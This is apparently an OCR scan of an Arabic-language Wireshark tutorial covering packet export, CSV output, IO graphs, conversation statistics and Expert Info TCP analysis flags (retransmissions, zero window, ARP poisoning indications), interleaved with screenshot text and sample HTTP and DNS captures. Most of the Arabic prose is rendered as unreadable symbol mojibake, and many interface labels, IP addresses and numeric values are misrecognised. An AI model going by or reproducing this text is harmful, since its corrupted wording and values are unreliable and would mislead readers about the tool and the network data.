001 
002 
003 ^ 

n 



5 kbak Packe*. (toggle) 
Ignore Packet Ltaqgle|i 
S«t Time Rtf ercRrte fioggSe] 
fTmeaiift... 

Edit Add Paclort Cgran«it. 
rtttnmlly Keep*,* Ad*wi 
Stppry af. fitter 

Convertado^ FitttJ 
Celorne C«tv*«u1i4n 

5CTP 

Folio*. TCP £tr**m 

FtritaW UQPSV«am 
FoWcvr SSL Strom 



90 24. 6. 171. 220 
20S, 53.142.190 
20S. 93,142.190 
90 24. 6. 173. 220 
K) 24. 6.173. 220 
JO 24.6.17-3. 220 
208, 9 3.142.190 
75.75.76.76 



TCP 
TCP 
HTTP 
TCP 
TCP 
HTTP 
TCP 
DNS 



66 
54 
343 
60 



http > 21892 [SYN, ACV 
21S92 > http CACK] Set 
GET / HTTP/1, 1 
http > 21892 [ACK] Sec 
1514 [TCP segment of a rea± 
SIS HTTP/1.1 503 Service 1 
54 21S92 > http [ACK] Sec 

71 standard query Ox3efb3 



bytes captured (526 bits]) on note - 



Copy 

Ce - cde As... 

PjMlt-.. 

Shew Pet-feet n> Hew Wnrdcyw 



TCP 

PN-GBA 5*rvef 



06 


oo oo is 


f>6 


6e 


»f cf 00 


POO 


04 


05 b4 Ql\ 


03 




tV!***** Dlujd Cir] 








View I Reset Coloring 1-10 

(Export Packets that Interest You) cr^ <0*^ J^* 1 ^ i 
ji conversations cj^UjI <^ j^^j '*^asl!I CjVL^VI ^ ^1 jjI L ^ti\ j £±E J-axSI ik. 

^louj jll ^jlil! ^ File c3> j^ 31 c> ^ tf" ^ 6iA .(tcp.port == 80) TCP 80 

a yM\ J^JI ^ ox* US ^Export Specified Packets c>j 



j^W-Jta^*rV; E^pc-rri Sp*g3ffifrd Packets 



DCS ^ i.i ! ■ •\:ri'i 



Computer 



i fvomave (gocrad poc^iet-s 




p3 File jU^^ (mark the packets) ^^4*^ ^ 'o^j^^ j 15 ^ ^ Ai^j ^Ikii V ^1 ^>JI ijjj disS lil 
jUiklj ^j^JI p ^ UxiUuAl djli JS ^ c>jVi (JjjjUJI jjj jisll JiU. ^> tSlli ^iij .Export Specified Packets 

^ JS ^ ^ j .Mark Packet (toggle) 
f5 'File I Export Specified Packets ^ .^U^ -u^j ^iLk ^ l^ulxj ^ j£\ ^>JI tli^aljjal 

.First to last marked J Marked packets H jUi^U 



https://www.facebook.com/tibea2004 



733 



^UJI ^j^JI ^isll l^L ^ Ujja^j ^ j£\ ^>JI ^ia ^ .Jaia 4_iLc ^ (^jaJI Packet marking .Captured 

(Export Packet Details) J^at& *k 

jj^j Cj! jlrk aIuj c^IUa .^JUll JiSill J ^ JaJI J^»^ jj^^ File I Export Packet Dissections 

.(comma separated value) CSVj (plain text) yr* ^j^ 1 cjIj^L-oII g^ljji o^j 



Eil* Edit gicw fia £.*pts>re Ar-a*,?e gUiflKi Teltphcjij, Toofc [rttemds fcjdp 



Open gecent 
[mpOH... 

E-.pcrt P-ack-tt Drssecticni 
£j*ert Selected Pntket £yt«... 
EipCMl 551 5*SW" Kty?... 
Export Objtcli 

m Suit 



5hflb-Clrl*-S 



CV*r Appty Siv* 



£i«tirart»fi 

73.170 
19?. 168.1. }82 
161. 5*. 73.170 
161. 58. 73.170 
19?, 168,1.182 
WL 168. 1.182 



Protocol Length 



TCP 
TCP 
TCP 
HTTP 
TCP 



168, 1.182 
58.73.170 
163,1.18? 
163.1.18? 
58-73.170 
58.73,170 

as "Plwi lent' file... 
« "]*miSc fipT file... 

H "C Sp«ys-' Spocta. bytei) Titeo 

Xf* - "Py.lL" iIpMkel vumrnii>'] rile... 

^'XM - (p*cket 4*«#il0«^ 



Tune -since pf * 

o.ooooc 

0, 15099 
0.00011 
321 0. GOG 3 8 
60 0.14004 
254 0.00905 
0.00031 
0,00119 
00001C . 



62 
62 
60 



60 
?0 



) on interf 
ksy&G_df :8C 
Dtst: l6l.Scr T 



Transmission Control Protoco 



Src Port: cplscra 



Source port: cp 1 scrambler -a T (1088) 
Destination port; http <80} 
[Stream index: 0] 

sequence number: 0 (relative sequence number) 
Header length; 28 bytes 



e#ekrt*: 5» Dis#J*ytd: U+rtt* ... Profile D*f?ySi 



^jjaiiill jlikj _ jjjiiill cijUi jlx-d jl ^_>^^ djUji^ ^ tiljjjij cJ-a-^ (jl ^jjii ci u£ lil (Plain text) c-h^^ (3^>.>Lii jUkj 

.(JjI^jIIj l_ic!>Ij3I (j>» ^j-^ ( L - J ^^^^ cJjl^ ^^^^ l£-°) ^>^l 2^^^^ 4^^JI CjUi ^IjjIujV CSV 

( ASCII jl HEX Oi-^ f e l>V) fj^ 1 ^ J '(fj^ 1 

. JjJaal j iiLai ^ill <J£joJI Ai^stxJ *L<»3^I CjLd jls«-<» jjAj^j 



■ Sti*cted packed 

Qfttt lo tea walked 



Cstfyrtrf Droved 
359 
1 

i °^ 

0 



y] Pacfcet BummarY In* 
y'; Packet deta*§ 

QPBCllMt^flS 



l J feiTtev* lor , 4r«^ fwsti;*it* 



^y^aj uaIa (jj< unll CjU ^Ij^V Jua Lu£ 

Frame 4: 321 bytes on wire (2568 bits), 321 bytes captured (2568 bits) on interface 0 
Ethernet II, Src: AmbitMic_0b:b9:44 (00:d0:59:0b:b9:44), Dst: LinksysG_df:80:c7 (00:04:5a:df:80:c7) 
Internet Protocol Version 4, Src: 192.168.1.182 (192.168.1.182), Dst: 161.58.73.170 (161.58.73.170) 
Transmission Control Protocol, Src Port: cplscrambler-al (1088), Dst Port: http (80), Seq: 1, Ack: 1, Len: 267 
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Hypertext Transfer Protocol 
GET / HTTP/1 . l\r\n 
Accept: */*\r\n 
Accept-Language: en-us\r\n 
Accept-Encoding: gzip, deflate\r\n 

If-Modified-Since: Sat, 16 Mar 2002 07:16:37 GMT; length=69556\r\n 
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\r\n 
Host: www.packet-level.com\r\n 
Connection: Keep-Alive\r\n 
\r\n 

[Full request URI: http://www.packet-level.eom/l 

CSV J**-21l J Ji» ^ M • 

"No.","Time","Source","Destination","Protocol","Length","Info" 

"2","0.251957000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"3","1.252833000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"4","1.253087000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"5","2.252841000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"6","2.252903000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"8","4.252909000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"9","4.252977000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"10","8.253355000","24.6.173.220","75.75.75.75","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"ll","8.253600000","24.6.173.220","75.75.76.76","DNS","77","Standard query 0x5451 A www.chappellu.com" 
"12","8.298331000","75.75.75.75","24.6.173.220","DNS","93","Standard query response 0x5451 A 198.66.239.146" 
"24","8.449268000","24.6.173.220","75.75.75.75","DNS","84","Standard query 0xcl6e A www.google- 
analytics.com" 

"25","8.465908000","75.75.75.75","24.6.173.220","DNS","304","Standard query response 0xcl6e CNAME www- 
google-analytics.l.google.com A 74.125.224.128 A 74.125.224.130 A 74.125.224.133 A 74.125.224.129 A 
74.125.224.142 A 74.125.224.131 A 74.125.224.135 A 74.125.224.132 A 74.125.224.137 A 74.125.224.134 A 
74.125.224.136" 

"26","8.466750000","24.6.173.220","75.75.75.75","DNS","84","Standard query 0x91 1 1 AAAA www.google- 
analytics.com" 

"27","8.478874000","75.75.75.75","24.6.173.220","DNS","156","Standard query response 0x9111 CNAME www- 
google-analytics.l.google.com AAAA 2001:4860:4001:803::1006" 

EXEL J5* <*>i ^ULu j,uki ^ CSV ^iJii-V • 



hortinf onmaUorv.csv - Microsoft Excel 





Home Iniert Paje L= F-ormul Oala R«vi tw View 


Atfd.Gn Load r* PDF Aoroba team ^ 0 = s 




HI 


£] HCtSt 








A 




C ] D 1 g 








1 


413 




TCP Delta Source Des-tf nation 
0-000494 24.6.173.220 7221-91.19 


HTTP 


Length 


HOtt 




2 


416 


assets-. sendlesft-DDm 
assets, zenctesk.com 
assets., zendes k.com 
asset&.ienitesfc.cQm 
do ma 1 1 name. <._com ,<j u 
domain n^meS- com, an 
domainnjmes.com.au 
da ma i.n narne-s.com. a u 
domajnirames.com.au 


3 


416 


0.COCS63 


IX0O1361 24.6.173.220 77,21. 91. 13 


HTTP 


339 


4 


417 


0.001232 


0.0O1633 24.6.173.220 72.21.91.19 


HTTP 


3.91 


5 


505 


0-011934 


0,063205 2^.6.173.220 72.21,31,13 


HTTP 


407 


6 


53 


0.233015 


0,000493 24.6.173.220 5C.57.ilfi.49 


HTTP 


333 


7 


76 


0-194665 


0-Q0G4O7 24 6 173.220 50,57,113.49 


HHP 


393 


a 


79 


0.00O164 


0,000757 24.6.173.220 50.57.113.49 


HTTP 


401 


9 


S3 


0.004314 


0.O0O537 24.6.173.220 50-57.113.49 


HTT3 


3S7 


10 


as 


0.004547 


0.00OSS3 24.6,173.220 50,57,116.49 


HTTP 


334 


11 


S3 


D.0OO36« 


0.000336 24.6.173.220 50.57.113.49 


HTTP 


399 


do mai n namei.com.au 




:i h 


k H 


ho5 tmf frnnfltioii • J 






>fr 




few* | 


StroU lock, 


o i 




rS.-OEB .10096 O t+> ,J 
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(Build and Interpret Tables and Graphs) ^h^I ?j^J\j JjI^JI Jt^&j fi^i 



c> .TCP RST TCP SYN ji DNS J* J j— aJI JS* Oj£ ^ M ^ J u J^ 1 J 11 

<iajoj| AjtjalVI 6J^J^a (j-G djUi jlsLxJl (j-G ^3^^ ^1 J^^'ll A J A -\ uaJ) j^ii ^^jll Li L_ fl^>su ^5^1 L_lifla3l JlLd LgLgJ 

Quick Reference: IO Graph Interface • 



| Wiw&tarfc [O Grtpfc: http-dowfltoad 1 Old. pea prig 




/O^J! Jl J^l ^IjSll ,>^X jj^l [Graph area (X axis)] (X jj^t) ^\^\ 1&1a 

.y-^jlc. jl ^ULJ ^jUJI ^ J! liA [Graph area (Y axis)] (Y jj^t) ^alj^V) ^LuJI ^jJI 

.^UJ! ^Jl J^xj/o^I JjjVl ^ i^i^JU (Graph buttons) urh^\ f»*J\ jljjl 
<> g?l U£ ^ ^lifell JU£V! e j! Filter jjJI c> j*^ (Filter area) jJBUM 



.2 
.3 
.4 



.dot formats j '(floating bar) fbar 'impulse *Jaji»aJI (Graph style) cr^t ^ .5 

Time of Day format Ly^xj/o^ J o^jf- yr^j^ J^»U31 i^f^a (X Axis) X jj^ll .6 

.X jj^U 

^UjI! V^ 31 c^W 3 ^ f^jlt IO jll ^ jLijjl jll Y ur*ji\ lU»U3I ^1^1 (Y Axis) Y jj^t .7 

.CSV 6^ ^» r-J 3 ^ ^ 14 Jj* 1 (Copy) ^^Vt jL*31\ .8 

.(.png, .bmp, .jpeg, or .tiff) ^ ^>^Vl ^UJI ^J! (Save)-S^ .9 

Conversations Ijj^j u j^J > ?n ^ s jajiJI (statistics windows) ^UL^^^n ialjj ^> jj 

.Endpointsj 

(Check Out Network Conversations) ^^Jt cjIjjI^a ^> jiaalt • 
^ qaj Statistics I Conversations c> .^J^j^J^ cjUU^I ^> ajjUJI jj^la ^ cj^^U^II siaU ^iL ^jij 

.dijU j ^LJ tjc. Jjaj TCP ^ 
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E 1 ] Fibre Ch«wel [ f DPI [ IPvfc 37 1 1P <&\ IPX j J*IA 



.- n :1 ■■r A 1 






Pert B 










? 


19976 


154*4222.120 


http 


24 J6.1 73.220 


19SB0 


1S4A42J2.10 


http 


24 £.173,220 


19S45- 


1M44222.1B 


http 


2JJ5.173J20 


1W56 


16444.222.152 


http 


2 J £173.220 


19S4? 


66.71216176 


http 


24J6.173-220 


13991 


16444222.10 


http 


24£.173.22ft 


19944 


164442J2.46 


http 


2<U6173-220 




16444222.152 




24JS.173J2ft 


19961 


74,123224.59 


http 


24j5.173.220 


1995ft 


14444222.46 


http 


24 5173220 


19943 


1444422246 




2-5 $173220 


19S54 


16444222.46 


i- ■ ■: - 


2JJ5473.23& 


19974 


16444222.120 




24£1732£0 


19955 


16444222.46 


http 


2-15173^30 


19951 


164,64222.46 




24j6.j73-?20 


ww* 


1*444222.16 












j". Hams resafution 



NCp{ RSVP f SCTpj TC*63 !_To^ 
* Packets 



564 743 
251 263 173 
150 154 465 
137 141 541 
123 134 3*5 
120| 119199 
116 710 
111757 
103470 
65 G®5 



121 
111 

L1C 
53 
9Q 
f- 



4142B 
$2044 
59 361 
46111 
#570 
36923 

13 Mtt 



a iLmJ ) ( fllLV Name resolution . j^;^*^ * \ ^ ial_L<JI J llLujV ajUj^. < aLa Jl jj i 

.Duration j Relative Start (Rel Start) s^ct t^js tSlili tjjyJI j! cAiaUJI jlLJ li) 

i> Jl jjAj Duration ^ >^ .££511 J conversation 1^3 j^Aj (Relative Start time) yr^' ^ j 

.£jjj]| L_aL J Aj^U^JI SjJ^Vl jaJl Jj Aj^U^JI J jVl jaJl j* C^jll 
^Lal J ja. £JJ-<Jl (j* ^jjaall (J^J^ 3 CP" J^a] Jj jfisl\ liA (J)JJ^ cilj£ aj 6 j^jaJl jjla Alkla J jjla tiLJ jl£ lij 

.Limit to display filter 

J*^ ^ ^ - ; ^ ia A\ a!i^\^A\ (UDPj TCP CjU!^ Ci^j ja jl*) Follow Stream (jj* j^l 

. jjjajjJa^ll ^jJJ Jj^al jjll lS^VI 

Quickly Filter on Conversations • 
Prepare a J Apply as Filter H Conversations J& cwVl ^jUJI j jj l Conversations ^ c> "*y& 
J jjj-G ja jj ^ill dUjVI ^j^j ^Ij^j Conversations J^ s ^ tij^USlI j^ jxJI jj^li Jc^ .Filter 

. JU3! 

^Li^lc (jja jiJU dix^ lij ( JUaII Js- ."B" u^*^ J^ ^ l$\ "B" j "A" u^*^ J^ ^ j*^ cJ^j "A" 
j! jj*JI c5jj j! c^>j ^UDP j' TCP M^jf^' c3> cj^S lij .B u' y*^ A u' u' 'IPv4 cl^j^ s^jf 13 ' 



TCP Cen^EJWtions 
Seltclerf 

... and npt Sfkrtctl 
[ev — rmw — 




^4^.173,ja 199i: 
J4j6J73J5Q 15*30 
24J61732B 1&S 
24A173iB 19356 
24*473220 15*1? 
24*475235 1M44 
24.4.i?3220 19381 



Apply ■>■ Fittf 

Prepacta fiftw 



24*473.220 cnwmtirt-lmp 44-71216,157 

I4J6473JH0 1998J 144SIJ22152 

2*j6J75220 19H1 T4125J24U9 

24j6473220 199JJ U4£4J22^S 



hrtp 
^■^ 

-:tp 



112 
111 
114 




Limit ^spl^ 1 filter 



Wp 1 1 fispy 1 



fFBtiowaHjm] [ flea 



Locate the Top Talkers ^ 

(^ill C flJjJaxll jC L— laall Jl ^-ll^J (iljli 6 jjjaII A£j2kJ iaUjjVI J) A^JjaJl ^JjoiJ L-JJjuj ^^J jl jl^J LdAlc. 

„(^jaJI oJj ^cjjUII J&) bandwidth 
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^j^i qa <^*j ^bandwidth (Ja** ^ 
Statistics I Conversations I IPv4 or IPv6 



UaLij Conversations j& jj^t • 
IPv6 J IPv4 *\y* Conversations t> cs' 
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(iljLujjjl jll ^^JjujI t^Ailjlkl ^aJ L_flJjJaxJl (jl J tiLuU L— lj£ ^Jj) A^JjuJI (jS^JJ JJJ-<Jl ^^P" L>* ^ ^ jl C3^W ^J*^ l— li£ lil 
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(Decipher the Protocol Hierarchy Percentages) <-iuu]L JjSjjjjJJ ^jfSt J^luuJ) • 
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jn^io j& U tCjllnkill d^A £a Jaia iaiijj l^lo X23.14 'TCP JJ>^^ 5^ C> %75.13 

? TCP jj^ 1 c> ^>^^ ^51.99 

<teardown process 'acknowledgment 'TCP c> ^ > ' lS^\ 

tcp && !http && !db-lsp && !ssl lP 3 ^^ t- ^ o^jc- 
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. (live capture)^} UssIVI U** (Graph 3) 24.6.173.220j (Graph 2) 207.236.215.136 Jjj c> 
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u' J] a 1 * ^ 160 J'j^ .4^*^ lGraph jj ^ f .Graph 3 
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Expert M Unreassembled M ^VU p J^U^I • 

Iajj J£ ^jjoj ^jj tt^jojbl! . (Warnings tab) L - j ^'^^ 3_^^lc ^j-ajJa ^illk^ ULjaa ^la^ cJ^J^ <^ 

.TCP reassembly J^*^ UjV "Unreassembled" ^ 
(Edit I Preferences I TCP I Allow subdissector to reassemble TCP streams). 



& €«o*s,-& COJ O Warning^ £ &2;. O Mtstts; 108} i@ Chati 149 | Ort*^s: 5flJ j Pa« 5c*t Comn^mst & 




<uj 6 (Expert window)^ ^jf^^ siaU (j^c-j j) CjIjj^jII ^LojIj^ <L^al ^ j CjIjj^jII JaIj>j ^ 

.^U3I J£^3! ^ ja US t^j^l Sj-a (Expert window) siSU ^ ^ <TCP reassembly 
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$ tJ^ra 0 (9) O Warning J #j O 3 CIS) |@- C*ms= *** j Dd^tv 5» Commer** 0 

Group * Protocol * Summary 



* Caunt 




Filter on TCP Analysis Flag Packets • 

J& jjjki JjjL cp- tsllij TCP analysis flag packets ^ WfL>*j ^ J^ ^ j^jc 
jSlal! diu^ill siflU ^» jIxjIoj! j s^jjjII L_aL J TCP d^l^ o^j*-! li) .tcp.analysis.flags 

'TCP analysis flag TCP J-H .tcp.analysis.flags &&! tcp.analysis.window_update 

^Expert Infos J fUaiSfl CiljUW 4*2«3 ^iilU^ ^ 

t^Lk^VI (-jUjujI .(J^Ui^ll t . uju^j (sill L* ^£1 Jj^j V 4-^1 j tA£jJo3l J <J£Lix» j^^t c a ^ *j ciljLijjl jll 

t ^ lc jjJj JJ^VI L-jUjoaVI ^-laLJl lifc ^JjuJJ .A^JjuJI pbl Jc JJjJ (jl 4 j£ aJ La Aijatxa Jc tiljcLuiJ dlUa^Lallj tdlljJ^jllj 

. notes j warnings j errors *Ua*>Vl 
Packet Loss, Recovery, and Faulty Trace Files • 

LdAjc .lia. cJ^^ iS^Jl A ^ H ^ .£f^ L_aL» J TCP £^^-1 lilUA <jl£ tit La 4ij3LxJ (jl^J t J^JjJajli <j£Labd jc l— La ill <Jjfi 

,AjjajLajVt A^JjulJl 

Previous Segment Not Captured (Warnings) • 

J.n\..n ^15 J Jt bUU ^ jaJI l_jjj jj ^^uL ^Ijl^jjt jll .TCP ^VU^it J ALUt ^ jaJI ^jj V ciljUijjt jll Jt jjAj j^jII liA 
Jlft t4^j*ill a j£J>l J S^lc jaJl ^jl^flfl -L^P J**^ ^t^c J ^ jaJl j* lilliA jj^J Lo^jc 3J j^-udj t q^t j£-aJ jUlbj TCP 

^ijjialt d^j UjLuj ^Luj jJt ^j^JU 4lo> ^>Jt TCP ^ ^ ^ (Sequence Number) J^Lault jjj jjli . jjjt jll jt j^jj^t 

ACKed Lost Packet (Warnings) • 

^ -LUftVt aJ^xj c^a tit .l^j cit jj^Vt ^jII cjUUJt ^ jj ^ -oSJ ^TCP ACK ^j^j^^ j^^ j^Aj j^^^ ^ 
^jjjII c-iL .ciljUjjtjlt ^ jaJI AilS a^jj J^ j^la jj^ ^u^j V j^ ^j^Jt J^ Jjy^J s^Uj dj^j spanned switch 

Duplicate ACK (Notes) • 

^ jl ^ J ' j& tiA j 4^3^ ^ j^-t t °j - ^ a djUUJt J3j TCP J^ 3 ^ ls^\ djUa^.!>L<Jt 

<xijaJt JljuJjj S^lct ^gjtJJjj 4 (ACK J ^J^a ^ 4-^_pJt djUUj ^jjoii t . lllal ACKS J^J-^^ J^ ^•^ c - ^j^. 

.(jj jtjlt) 4_i^. jlilt jl$J> jt JjJjjaJt t . nun ^l^t (jj^J Jilt j A-dj^Jt (jt^aa AjJa JlsLilt A-iLiC ^j-d 6 ^ j'^^^ 

Retransmission (Notes) • 

packet i> j^' <^ tiA .^Jl^jt ^ cjUUJt <^ jt J^ c_i^UJt disjlt J acknowledgment (ACK) Ji^ 

.(jjjt jll jl^. jt JjjjJuJt JjS ^ ^ jaJI Jaliojj c_jjjudj VUi^t jSSVl j jll) loss recovery 

Fast Retransmission (Notes) • 

J s jj£* ACKs Jj^jJt Jl^ j j^u j-d j^>^ mi l^-Ala jit CjUUilt ja. tiljLoijjt jit ^ JJ Ui^JC CjUaJ^^LJt ^V^l 

c^jVl J^ ^ji j Jll) packet loss recovery <> j^' <^ liA .ACK J c> Ji^ 20 uj^ 3 ^ 

. (A-ia. jjlt jl^J> jt JjjjJjJuJt ( ■ UjuoJ ^j^l! 

Asynchronous or Multiple Path Indications • 

cj! jLoiJt ^t . j^t jLaixi ^ jtjltj jLoui ^ 6 j^L^ill ^jaJI jLoj Jt jjj^j (Asynchronous paths) ^IjIaII CjIjU^I 



(LoiaII j-G ^jAxlt 



jjU jiualtj Djjsu^a e-l j^.t d^c Jt o^l jit cjUUjlt ^jjo^j ^jj LqAac Jt jjJjj* (multiple path) Sj^jLIaII 

. j^-Vt j>» ^J^^ J^-^ cJ^^^ ti* ( ; ijjujj jt j^J .L-i^JI Jt 4 alia all 
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Out-of-Order (Warnings) • 

£pSl j] Jj 11a jjAj ^ .AijLaJI j^JI ^ Jal TCP J^l^J ^Sj J^ l£ ^ J ^ J-^J^ c^) J^^' ^ 

J j^jj Lua jUalil J UJ^ ^^^1 (J I VI <S£j^ui V S^lc j& li^ .c fl^J) Jj J jj^a jll 4 at£ a CjljLabG J j]a Jc (jj^J JJ^>^ 

■ s jj^ ACKs j jj cf- iS 

Keep-Alive Indication • 

*Lij] 4_iL^ tt^li j .(JjSluixSI J ^ul^kloaV ^ j^L* <j£3 j J-oLk TCP JL^il TCP keep-alive 4_*Lo ^ 

^■vVunrtll AjjjjjJa jjiJl ^LdUJI djliiil! TCP peers J^ c iULa* uj^j La^jc JL^iVI cciia jll jjjSJI ^L V JL-ojI 

.JL^iVI Jc^ JiliaJI J 
Keep-Alive (Warnings) • 

aJ JIj lij >c >jll c> 6 jttl peer c> JL^jI ^1 TCP * J^ ^ TCP Keep-Alive <0^ jj 
U s^lc Keep-Alive ACK *^j ( ^a^S I 6 jk±u ^ill c^S jll jl^L» . JL^iVI *L&jj ^2 Ujj -uli < Keep-Alive ACK 

.aK^> 6J Ln^L j*Vl 11a Jl jkb V .TCP < J *^j 
Keep-Alive ACK (Notes) • 
urn I^jI Jc jlaii V .Keep- Alive packet J ^IaIJ J* * ^ 
Receive Buffer Congestion Indications • 
t> ^jLLJI iaL U jl£ lil jll cjULJI ( Jlill siaL) receive buffer J^ J^^J TCP J^l t> l£ 

J*3 J^'j zero window t> clAs ( <j > ?™1 1 < Jl** buffer .buffer *lU Jl iPJfc ^ ^ 6< V^ buffer 

<J!)tk buffer J 4.^11* 4_^.Loi^ ^jl < aj^u^ti jjjau JL^iVI I^a ^^Ic c a^u^i l^JLojjl ^jj CjLLJI cl>^ 

Window Full (Notes) • 

L-baJ l^sli ^ ^ ^>JI .cJ^i3 Wiall buffer ^ ^ 

.zero window s j^-^^ <-ajaJI uj^ o^j 

Zero Window (Warnings) • 
<^Lai^ ^1 ^.jj V <il tiA j ^TCP window size value of 0 if- dAs cU^i j^ 5 Zero Window warnings 
C5 SluM buffer ^ ^ (i j ^W 51 c> ^J^ 1 lS^j) V TCP J-^t c> j^Vl c_uUJI .^11^ buffer 
uj^ .c^ 1 ^^ o- 3 ^ buffer Jl c> V zero window <^ l^^^ ^ *<j > ?™1 1 J^ c5^^ ci^ 3 ^^ 

prompt * lW^ C5^) user prompting process J 'overloaded host t^aUJI J^^' c^j^ cf- ^ 

Zero Window Probe (Notes) • 

(j* ^jLlkl * 11a t^lc jl<i buffer ^Lou* ^\ Jls l^^JI lij L» ^.a^j J jU^j c Luia^H ^jl Jj jjiAj oj^a^JI 

.zero window recovery process 
Zero Window Probe ACK (Notes) • 
<SU jli ji^a Jl window size & Jt V u 1 ^ .Zero Window Probe Jl < <j > ^^ t c_jUi^I Jl s d^a jj^j 

. zero window 
Window Update (Chats) • 
.4ljLaJI <-ajaJI J aJ^ di>l£ Lui TCP receive buffer space i> ^Lu^ a^jj <j\ jo Jui jJl jl Jj jjAj chats ^ 

.zero window ^ J^^j recovery ^Jp- I^aj TCP ^jVL^jI J sjIc 11a jfi^j 

TCP Connection Port Reuse Indication • 
^jj lij .<j <j^aUJI leisure J^ connection timeout <iaLauj ( jjjinM l jlS lij <K ^ jl JL^jVI ^l, ^ "m l sjIc) 
.(TCP Reset) ^•^J^ lP^j J 1 ^ t^j^i ^ii<JI ^Sj ^1 ikiujl < cJj^-^ u' cJ^^ JL^aiiVI 

Reused Ports (Notes) • 

,^^Jl oi^ j j-d ^JjI^jII Juljj .Liajl tdlij ^ j£j J-«VI (J^a^ill CjIj^Ij 4<LLuJ! ial_Lal! 
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Possible Router Problem Indication • 

j!i jl Jl ^J ^ ^s^>*-^ test router uj" 1 ^ j ^1^4 ^ U^b .^Uc. ji&l dia^al Igil ji&l ^f^al J jl Jl ^> j^j 

4NOPs in a Row (Warnings) • 
.^>ll J Jljll Aijj j p3 4 (No Operation) NOP '0x01 J* TCP J J) ^ 

cj^j U sjIc j . jJULa ^jj ^jj Vl <4-byte boundary j TCP j NOPs fl^^l ^ 

Misconfiguration or ARP Poisoning Indication • 

.a jj^aLa jjc. jl ^ jj^aLi 4 K ui ^ jj lil 1* ^j^j] J l3^^ ^ j> j 4j> JJ ^jLujI ja Expert ^ 

Duplicate IP Address Configured (Warnings) • 

Jc <J jj^^J] 4 qVi^ ^ 6^^.^U jjjUc ^Aaj ( jl jixJl (Jjl^J <J j£ jJ j^>j) ARP *M a^Loal ^_>^ L>^ J*^' C5^J J^*^ ^ 

dutj jl jjc) > ^> cJ^joiJ <JJj£j ^aJ c fljjjaxll JP jl jjc (jl jjijaiJ (jl La] j£-aJj Ajliil jlit-a jjiC. ^al liA .4juaij XP 

.ARP poisoning J ( (dynamic address)<%^ ^ jl jl jjJI ^ J-*^ c?^ (static address) 

.cjlia^U! jl cj) jji^ail j-* ij\ Jji^al (Expert Infos window) ft jf^l S^U ^jiS f IL^I lJI nl 

m *\Si\ f >uu l_lluu 4JI Jp J^JI Jl SjUiVI JjS TCP J*Li« $\ CP 

^ jj U^c . (receiver congestion)^^^ f^J'j f 6 TCP<^ *U^kl ^Ijjl ^ ajaJI ^ ^3 jUi jjIjII 

. "tcp.analysis.flags"^ ^ ^a£^JI J JSLi* djj^. Jl jj^j Jll ^jUjjIjII 
flags j» TCP analysis flags ^ j ^ ^ ^ tALLJI ^l^JI J iaUJI jj^j IP jl jjc ^j^fSaj* ^ 

^aaJ J «>Lu4j| Jc; JJ^lJ lil 

j-Q <^.ti<i 4aL.ii<i iA\ a) L_fljjjaxJI jl Jj jjjjaLi j <uLai ^j^. j (window update) ^u^^l J^ j .^j^ > *° lS^^ 
^ ^jj* ^| ^j^Vl ^jiJI . tcp.analysis.flags^^j f^/^j^ ? j% tdjl^jjljll .^l^ll J^ buffer 

ajjUJI ^juj J| j^ (window update) ^u^^l ^j^> ^-1 .Hnmi jl c . iaj j^J cillil TCP lS^^-^ ^5^a jl Jl <l JJi 

. tCPlS^U^ 4>^»>^ Jl 

djjAaaH ^j^. 3^.1 jj^a »1 jjj > l_L<»a j .Graph 2 J^ fbar c^-^ ^i^^^ TCP lS^^-^ jc- ^ j^j t J^l cJ^*^^ J 

J^ 3 ' ls* (tcp.analysis.flags &&! tcp.analysis.window_update) Jlill ^l^i^U ^Uij (window update) 
.Graph 1 c> cJ^ J V .<L^U jj^UII o^jjJ IO Graph Jj -Uj^ 




±W | | £«>py H [ S^* | 1 £JI^ 



Graph Separate Types of TCP Analysis Flag Packets • 

ACKS <J^J jt JJ LS^JJ *^ jiixJl ^cjI Jj^JI .U^-liJ ^a^lsrJl jlgiV Al^aiia TCP JSIj^J A^liJ ^ jjojj ^UijU llftS 6 Jtlll JSj^I J 

. JLujjVI S^loJ JJ c^jj Jll j 
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(Reassemble Traffic For Faster Analysis) jjj^Jt j-iaaj SjI^J 

tiljli ^binary ^s^-iaj cj^jj c±£ lij L5 la k ?^ j^JI Igj Ijjj-sl c _^j3I 4 > ^qll j& La i^j^JI (jc £<^-^ cJ^ j& lS^^ 

J jVI ^ (^^^s ... ^-^^ ^ <j^aUJl imaging AD jjj-^' cjUK) -*C5-^ ^ 
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PfOtClCut [rtfo 
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S. 111. 148.6 HTTF 

.6,173.220 TCP 

S. 111.148. 6 TCP 

S.111_X4S.6 HTTP 

.6.173.220 TCP 

.6.173.220 TCP 

.6.173,220 TCP 

y TTP A I tcp 

firCOM ?4 TCP 

*mb TCP 



Ctd-H 



Ctd*P 



Muk Packet <tegg lej 
ignore Packet (toggle!" 
Set Timne Ref efence • tc ^It.i 
Time Shift... 

Edcl a? Add Prefect Cd^rrt^rtt.. 
ManuQilry Kesotve A<fdr«s 



Apply ji FlUef 
Prepare j Filter 
C*?rwmitfti*n f iH*r 
Coladze CcnvertatLon 

;CTP 

■at\o-M TCP Stream 

oMow OOP Stream 
ol low SSI Stream 



t Frame 77 : 401 tiytes on wl re C320S bits> T 40W 
^Ethernet II, sre: Hew1ett-_a7 :bf :a3 Cd4;85:SP 
t Internet Protocol Version 4, Src: 24. 6.173. Qr 
- Transmission Control Protocol, Src Port: 35! Copy 
Source port: 35529 C35529) D«odeM., 
Destination port: http £80} ^ Prim... 

4 [ mmmm ^^ mm ^^^ m ^^^^^^^^ mm ^^ mm 5&H ^^^^^ m ^ m mmm ^ mmmm ^^^ m —^^^^ 



Show Pvc^ct im Hew Window 



O .*f File: 'CrMJ^rs... Packets: •6145 Displayed: 6143 Marfced; D Load time; 0K».271 "Tror^t wirethiilJOl 



object 5^ File I Export Objects I [HTTPIDICOMISMB] .1 

